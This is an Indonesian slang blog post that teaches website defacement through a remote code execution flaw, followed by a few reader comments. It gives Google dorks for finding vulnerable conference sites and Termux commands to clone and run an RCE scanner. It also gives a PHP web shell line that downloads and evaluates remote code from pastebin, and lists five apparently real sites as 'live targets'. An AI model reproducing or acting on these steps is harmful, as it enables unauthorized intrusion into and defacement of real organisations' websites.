loading...

DEFACE POC RCE UPLOAD SHELL TERBARU!!

Assalamualaikum wr wb.



Yo wassap gaes :V
Mumpung ada kesempatan nge blog di web team wkwkwk btw sibuk w anjg:( .
Kali ini gw SwamGans(GilangKun) mau kasih tutorial Deface Poc RCE !.

Sebenernya sih itu method dah lama ya anjg tapi gw coba tadi karna baca² juga sih di blog temen + dari gogel ternyata masih banyak web yang pulen(vuln) yang ezzz sangat buat di up shell + tebas peler nya xD

Udah ya anjg gk usah banyak bacod:)
Siapin dulu alat tempur nya xD

-Termux
-Dork Presh
-Rokok
-Face Gans
-Kuota anjg jan lupa !

Ok gan kalo dah siap semua langsung kita ekse aja😎

Pertama kita dorking dulu gan di gogel kalo perlu  di deepweb anjg biar pro👊😎

Dork:
    ~ inurl:/brandUrl=http://
    ~ inurl:/signin.php?ret=http
    ~ +"Public" +"My Conferences" +"Personal Library" +"My Profile" +19.49.5200.0

Masukin dork di atas ke gogel :D
Gk paham? Tolol babi liat gambar di bawah anjg.
Udah paham kan anjg?

Nah kalo dah paham tinggal lu cari web vuln nya xD
Caranya? Ezzz banget dong pastinya :*
Kita install dulu tools rce nya.
Buka termux lu asw kalo ga punya donlod sendiri jan manja ! W hek modar lu anjg.

Ketik command nya :
$ pkg update && upgrade
$ pkg install python
$ pkg install wget
$ pkg install bash
$ git clone https://github.com/GarudaTersakti72/RCE
$ ls
$ cd RCE
$ sh install.sh

Udah ? Nah kalo udah cara cek web vuln nya kek gini :

Ketik : python Rce.py http://sitetarget.com

Gk paham? Liat gambar anjg.

Paham?.
Nah sekarang cara biar tau web itu pulen atau ga gimana? Ezzz kalo udah lu klik enter bakalan ada tulisan pulen/tidak pulen kok xD
Kek gini nih kalo pulen.
Tinggal kita up shell deh xD

Caranya? Ketik :

echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/CurQrH1a")); ?>' > sel.php

Nah kalo bisa ke upload shell nya kek gini nih liat gambar anjg jan liat bokep.
Bakalan ada tulisan No Output.

Cara akses nya? Ezz sangatz http://sitetarget.com/scripts/namashellu.php

Jederrr memexxxx ke upload kan? XD

Terserah mau lu tebas index atau ngga :)

Live target? :
http://conference.jbhm.com
http://conference.crownquest.com
http://conference.longboatkey.org
http://conference.fveng.com
http://sa100.neenah.k12.wi.us

Ok sekian dari gw SwamGans😎

Masih bingung? Contact Me

JANGAN LUPA SHARE!
JANGAN LUPA KLIK IKLAN JUGA YA BANGSAD !
TITIP NICK TEAM INI YAK, JAN LUPA INDEX BACK UP YA SIBERMEN !
4 Komentar untuk "DEFACE POC RCE UPLOAD SHELL TERBARU!!"

Mksh tutorialny ^_^ ijin pkai life targetny ster buat belajar ^_^

Jangan lupa share ya. Jangan lupa juga klik iklan nya bngsd

Tolong skrip exploit nya kasih source h3h3h3
https://vulnku.blogspot.com/

Assalamu'alaikum
Bang Sy Mau Tanya Waktu Sy Akses Di Crome Kok Blank Putih Ya?
Mohon Bantuannya:)

Back To Top